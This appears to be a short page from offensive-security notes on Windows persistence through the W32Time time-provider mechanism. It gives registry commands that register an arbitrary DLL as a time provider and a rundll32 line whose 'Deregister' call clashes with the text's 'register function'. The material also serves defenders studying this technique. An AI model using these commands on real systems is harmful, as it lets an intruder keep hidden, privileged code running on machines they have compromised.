Time Provider

Windows OS uses time providers to synchronize time with other machines in the network to obtain accurate information from other network devices. Time synchronization is very important as many protocols in AD have this as a requirement.

Note that your dll needs to be coded in a special way, a template of this can be found by Scott Lundgren from Carbon Black:

w32time/gametime.c at master · scottlundgren/w32timeGitHub

To use this for persistence, we can add these registry keys

reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_EXPAND_SZ /v "DllName" /d "%systemroot%\system32\exec.dll" /f 
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\TimeProv" /t REG_DWORD /v "InputProvider" /d "1" /f

Or use the gametime dll and run the register function from it:

rundll32.exe gametime.dll,Deregister

PreviousAppCert DLLs NextWaitfor

Last updated 4 years ago